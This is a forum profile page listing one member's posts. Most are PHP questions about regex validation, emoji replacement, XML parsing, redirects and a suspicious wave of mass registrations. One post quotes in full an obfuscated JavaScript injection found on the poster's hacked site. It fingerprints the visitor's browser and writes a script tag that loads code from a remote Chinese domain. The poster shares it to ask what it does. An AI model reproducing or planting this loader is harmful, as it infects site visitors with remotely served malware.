Jump to content

speedy33417

Members
  • Posts

    80
  • Joined

  • Last visited

    Never

Profile Information

  • Gender
    Not Telling

speedy33417's Achievements

Member

Member (2/5)

0

Reputation

  1. Is it possible to capture the full URLs visited by browsers used in apps installed on my iPod. I have several native iOS apps that display web pages and I would like to use my PC to access the same pages. Are there any native or jailbreak apps that capture the history of URLs visited by these apps?
  2. Thanks for taking the time to look at my problem. No, I do not currently use a captcha of any kind. Yes, the registration script generates an email that contains a hyperlink to activate the account.. And in fact, over 60% of the accounts he registered were activated and logged in more than 10 times. Here is a section of the mail script I use: $to = $email; $subject = "Thanks for registering on xxxxxx.com"; $body = "Your username is: " . $username . "\n\n"; $body .= "blah blah click on the link to activate your account URL:\n\n"; $body .= "http://www.xxxxxx.com/validate.php?id=" . $user_id . "&v=" . $validate_code . "\n\n"; $body .= "blah blah blah"; $headers = "Reply-To: xxxxxx.com <admin@xxxxxx.com>\r\n"; $headers .= "Return-Path: xxxxxx.com <admin@xxxxxx.com>\r\n"; $headers .= "From: xxxxxxcom <admin@xxxxxxcom>\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/plain; charset=iso-8859-1\r\n"; $headers .= "X-Priority: 1\r\n"; $headers .= "X-Mailer: PHP". phpversion() ."\r\n"; mail($to,$subject,$body,$headers); The only form user entry used in the mail script is $email and I use the following script to vaidate it before using it: function validate_email($email) { // Create the syntactical validation regular expression $regexp = "^([_a-z0-9-]+)(\.[_a-z0-9-]+)*@([a-z0-9-]+)(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"; // Presume that the email is invalid $valid = 0; // Validate the syntax if (eregi($regexp, $email)) { list($username,$domaintld) = split("@",$email); // Validate the domain if (getmxrr($domaintld,$mxrecords)) $valid = 1; } else { $valid = 0; } return $valid; } Hope it gives you a bit more idea of any possible vulnerabilities.
  3. I have a PHP/MySQL based website. It's fairly popular and has plenty of registered users. The website was built from scratch and the only third-party/open-source portion is a tinyMCE editor used on the Forum. The forum itself is also built from scratch. The website is game related and provides game specific information, calculators, forum, etc. Today I noticed that there are over 500 registrations from the same person. He uses different email addresses and even different IP addresses, but all IP addresses are originated for China and site behaviour indicates that it is the same person. He never posted on the forum or sent messages to other members using the website's own message center. But I'm puzzled what he's doing on the site. I'm sure that he's up to no good, but for what purpose would he need this many user accounts? I was thinking that maybe he's using the registration page to hijack the registration form and use the registration email generatad and piggyback that to send out Viagra emails or something. My website uses plain old mail() to send out those emails and I'm not sure what I could do to avoid it if that's what's happening. Maybe he's doing cross site scripting or SQL injection, but that could be done with one account, so I'm puzzled why he's registering all these accounts. Does anyone have any experience with these types of attacks? What is the most likely scenario here? What is he doing on my site? Any help and/or advice would be great. Thanks!
  4. My username validation works on these principals: First letter must be alphanumerical All other letters must be alphanumerical plus space and -_. I use the following code if (preg_match('/^[A-Za-z0-9][A-Za-z0-9-_.\s]/',$username)) ... The problem is that it validates this: xxxxx™ How can I make sure that my username does not accept trademark sign and similar characters? Thank you!
  5. I'm using DATETIME to store time in a database and would like to calculate the time difference between two times like so: $timeAdded = "2010-03-01 09:01:00"; $currentTime = "2010-03-01 09:02:00"; //here comes the magic //....... echo "This user was added $timeDifference"; It should result something like: This user was added 1 minute ago. This user was added 17 minutes ago. This user was added 3 hours ago. What's the best way to do this?
  6. I have a website that's visited by iPhone and iPhone Touch mostly. The site takes comments and has a self-built forum. The iPhone has its own emoticons called emoji. When used in text they look like this: &#57612; Comments and posts are stored with the real HTML code for the icon, such as above. What I'm trying to find a solution for is replacing them with image tags when displayed. For example I have user comment in my database like so. $message = "This website is cool!& #57612; Keep up the good work!"; // Here comes the regex magic... $message = "This website is cool!<img src=\"http://www.mysite.com/images/emoji123.png\" /> Keep up the good work!"; The problem is that there are over 500 icons. I was thinking to use two arrays to store both formats: $emoji[123] = "& #57612;"; $html[123] = "<img src=\"http://www.mysite.com/images/emoji123.png\" />"; So if I find a emoji script in the text then I check which one it is from my array and then replace it with the corresponging html versio in the text. The problem is that I suck at Regex, and would really welcome any help that you can throw at me. Thanks!
  7. I have to validate a user input to being a valid HTML title tag text. Basically whatever the user would input here would be used as the Title for a specific web page. I would like to allow all characters that can be used for this purpose. I'm no good with Regex. I use the following code to validate user entry where only letters and numbers validate. How would I modify this script to use for the above example? if (ereg("[^a-zA-Z0-9]", $userInput))
  8. I've just completed a redesign of an old website. Some of the page URLs will be changed and I need to redirect ALL traffic to the homepage (index.php) if the visitor may end up at an old page (search engine index, browser favorite, etc.) I'm sure it's just a few lines of code but not sure where to start. Thanks.
  9. Notice: Undefined variable: result in /hsphere/local/home/somesite.com/posting5.php on line 172 Fatal error: Call to undefined function simplexmlelement() in /hsphere/local/home/somesite.com/posting5.php on line 174
  10. Thanks Darken. I looked at the tutorial, but it's still not clear how I can get those two pieces of code that I need to display for the applicant. I've never dealt with XML and it's totally new territory for me. I was hoping that I could maybe use regex to fish out the part that I need or any simple solution that would load the required part of the script into my variables. Anybody else, pleeeeeeaaaaase?
  11. I'm working on a website that deals with an xml response. After an application is filled out on our website we get a response sent to us in $result If the application is approved then it looks something like this: <tss_loan_response><signature><data name="page">app_completed</data><data name="site_type">soap_oc</data><data name="license_key">sample</data><data name="promo_id">99999</data><data name="promo_sub_code"/></signature><errors/><content><section><verbiage><![CDATA[<br/> <p>Thank you for your application. You have been approved. Please click <b><a href="http://www.somesite.com">here</a></b>to complete your application.</p><p>You will be automatically sent to the page in a few seconds.</p><script type="text/javascript"> var script_expression = "document.location.href = 'http://www.somesite.com'"; var msecs = 2 * 1000; setTimeout(script_expression, msecs);</script> ]]></verbiage></section></content></tss_loan_response> I need pieces of code from the $result 1. The code between <data name="page"> and </data> 2. The code between <![CDATA[ and ]]> How would I get them in $page and $data???
  12. Thanks all for the help. Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)?
  13. Thanks ober. This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected. If it's a trojan what does it really do? Does steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done. Thanks for your help.
  14. I have some weird code that appeared in my websites source code. Not sure if someone hacked into my server or what happened. Here's a the code. How concerned should I be? What does the code do? <script language=javascript><!-- (function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})(); --></script>
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.